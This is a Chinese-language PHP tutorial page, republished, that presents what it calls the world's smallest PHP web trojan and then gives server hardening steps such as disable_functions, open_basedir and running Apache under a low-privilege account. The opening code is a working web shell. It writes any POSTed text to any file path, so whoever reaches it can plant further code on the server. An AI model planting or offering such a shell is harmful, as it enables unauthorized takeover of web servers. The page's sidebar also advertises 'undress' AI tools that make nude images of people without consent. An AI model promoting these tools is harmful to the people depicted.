首頁 後端開發 php教程 全世界最小的php網頁木馬一枚 附PHP木馬的防範方法

全世界最小的php網頁木馬一枚 附PHP木馬的防範方法

Jul 29, 2016 am 08:40 AM
apache file gt lt php

php網頁木馬

複製程式碼 程式碼如下:


header("content-Type: text/ html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>


儲存檔名:









if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? '儲存成功!' : '儲存失敗!';
@fclose($fp);
}
?>

一句話php木馬

複製程式碼

複製程式碼

程式碼如下:






PHP木馬的防範方法


PHP木馬的防範方法
PHP是能讓你產生動態網頁的工具之一。 PHP網頁檔案被當作一般HTML網頁檔案來處理並且在編輯時你可以用編輯HTML的常規方法來寫PHP。
PHP代表,超文本預處理器(PHP: Hypertext Preprocessor),可以從PHP官方網站(http://www.php.net)自由下載。 PHP遵守GNU公共許可(GPL),在這項許可下誕生了許多流行的軟體諸如Linux和Emacs。 PHP在大多數Unix平台,GUN/Linux和微軟Windows平台上都可以運作。怎樣在Windows環境的PC機器或Unix機器上安裝PHP的資料可以在PHP官方網站上找到。安裝過程很簡單。
PHP的另一個好處就在於他的安全性,隨著現在互聯網的發展,網絡安全越來越受重視,PHP的誕生幾乎代替了ASP,因為PHP對於安全方面的設置是極為簡單的不像ASP一樣需要很多的步驟,和禁用很多的服務。不過再好的東西也總是會有不足,如果預設的PHP同意也是不堪一擊,因此本文就來講一下如何對PHP進行一些安全方面的配置,來防止腳本木馬的破壞。
一、防止php木馬執行webshel​​l
開啟safe_mode, 在,php.ini中設定 disable_functi 二者選一即可,也可都選。
二、防止跳出web目錄
先修改httpd.conf,如果你只允許你的php腳本程式在web目錄裡操作,還可以修改httpd.conf檔限制php的操作路徑。例如你的web目錄是/usr/local/apache/htdocs,那麼在httpd.conf加上這麼幾行: php_admin_value open_basedir /usr/local/apache/htdocs ,如果腳本要讀/usr/local/apache/htdocs以外的檔案將不會被允許,如果錯誤顯示開啟的話會提示這樣的錯誤: Warning: open_basedir restriction in effect. File is in wrong directory in /usr/local/apache/htdocs/open.php on line 4 等等。
三、防止php木馬讀寫檔目錄
在php.ini的disable_functi 後面加上php處理檔的函數,主要有fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose ,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile 。即成為 disable_functi,fopen,mkdir,rmdir,chmod,unlink,dir ,fopen,fread,fclose,fwrite,file_exists ,closedir,is_dir,readdir.opendir ,fileperms.copy,unlink,delfile,。

ok,大功告成,php木馬拿我們沒轍了,遺憾的是這樣的話,利用文字資料庫的那些東西就都不能用了。 如果是在windos平台下搭建的apache還需要注意一點,apache預設運行是system權限,必須給apache降降權限,如下:

net user apache f**kmicrosoft /add

net localgroup users apache / del

此時建立了一個不屬於任何群組的使用者apche,只要開啟電腦管理員-服務-apache服務的屬性-log on-this account,在這裡填入上面所建立的帳戶和密碼,重啟apache服務即可實現apache運作在低權限下。 總結:實際上還可以透過設定各個資料夾的權限,為每個目錄建立一個單獨能讀寫的用戶,來實現安全。目前許多虛擬主機供應商的流行配置方法,不過這種方法用來防止這裡就顯的有點大材小用了。只要我們管理員有安全意識,相對的禁閉不用的功能就可以確保網路安全的威脅。 下面是mcafee的安全設置,防止一些網頁木馬產生文件等。 http://www.jb51.net/hack/list461_1.html 以上就介紹了 全世界最小的php網頁木馬一枚 附PHP木馬的防範方法,包括了方面的內容,希望對PHP教程有興趣的朋友有所幫助。
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱門文章

<🎜>:泡泡膠模擬器無窮大 - 如何獲取和使用皇家鑰匙
3 週前 By 尊渡假赌尊渡假赌尊渡假赌
北端:融合系統,解釋
3 週前 By 尊渡假赌尊渡假赌尊渡假赌

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

熱門話題

Java教學
1664
14
CakePHP 教程
1423
52
Laravel 教程
1318
25
PHP教程
1268
29
C# 教程
1248
24
PHP和Python:解釋了不同的範例 PHP和Python:解釋了不同的範例 Apr 18, 2025 am 12:26 AM

PHP主要是過程式編程,但也支持面向對象編程(OOP);Python支持多種範式,包括OOP、函數式和過程式編程。 PHP適合web開發,Python適用於多種應用,如數據分析和機器學習。

在PHP和Python之間進行選擇:指南 在PHP和Python之間進行選擇:指南 Apr 18, 2025 am 12:24 AM

PHP適合網頁開發和快速原型開發,Python適用於數據科學和機器學習。 1.PHP用於動態網頁開發,語法簡單,適合快速開發。 2.Python語法簡潔,適用於多領域,庫生態系統強大。

PHP和Python:深入了解他們的歷史 PHP和Python:深入了解他們的歷史 Apr 18, 2025 am 12:25 AM

PHP起源於1994年,由RasmusLerdorf開發,最初用於跟踪網站訪問者,逐漸演變為服務器端腳本語言,廣泛應用於網頁開發。 Python由GuidovanRossum於1980年代末開發,1991年首次發布,強調代碼可讀性和簡潔性,適用於科學計算、數據分析等領域。

為什麼要使用PHP?解釋的優點和好處 為什麼要使用PHP?解釋的優點和好處 Apr 16, 2025 am 12:16 AM

PHP的核心優勢包括易於學習、強大的web開發支持、豐富的庫和框架、高性能和可擴展性、跨平台兼容性以及成本效益高。 1)易於學習和使用,適合初學者;2)與web服務器集成好,支持多種數據庫;3)擁有如Laravel等強大框架;4)通過優化可實現高性能;5)支持多種操作系統;6)開源,降低開發成本。

PHP的影響:網絡開發及以後 PHP的影響:網絡開發及以後 Apr 18, 2025 am 12:10 AM

PHPhassignificantlyimpactedwebdevelopmentandextendsbeyondit.1)ItpowersmajorplatformslikeWordPressandexcelsindatabaseinteractions.2)PHP'sadaptabilityallowsittoscaleforlargeapplicationsusingframeworkslikeLaravel.3)Beyondweb,PHPisusedincommand-linescrip

PHP與Python:用例和應用程序 PHP與Python:用例和應用程序 Apr 17, 2025 am 12:23 AM

PHP適用於Web開發和內容管理系統,Python適合數據科學、機器學習和自動化腳本。 1.PHP在構建快速、可擴展的網站和應用程序方面表現出色,常用於WordPress等CMS。 2.Python在數據科學和機器學習領域表現卓越,擁有豐富的庫如NumPy和TensorFlow。

繼續使用PHP:耐力的原因 繼續使用PHP:耐力的原因 Apr 19, 2025 am 12:23 AM

PHP仍然流行的原因是其易用性、靈活性和強大的生態系統。 1)易用性和簡單語法使其成為初學者的首選。 2)與web開發緊密結合,處理HTTP請求和數據庫交互出色。 3)龐大的生態系統提供了豐富的工具和庫。 4)活躍的社區和開源性質使其適應新需求和技術趨勢。

PHP:服務器端腳本語言的簡介 PHP:服務器端腳本語言的簡介 Apr 16, 2025 am 12:18 AM

PHP是一種服務器端腳本語言,用於動態網頁開發和服務器端應用程序。 1.PHP是一種解釋型語言,無需編譯,適合快速開發。 2.PHP代碼嵌入HTML中,易於網頁開發。 3.PHP處理服務器端邏輯,生成HTML輸出,支持用戶交互和數據處理。 4.PHP可與數據庫交互,處理表單提交,執行服務器端任務。

See all articles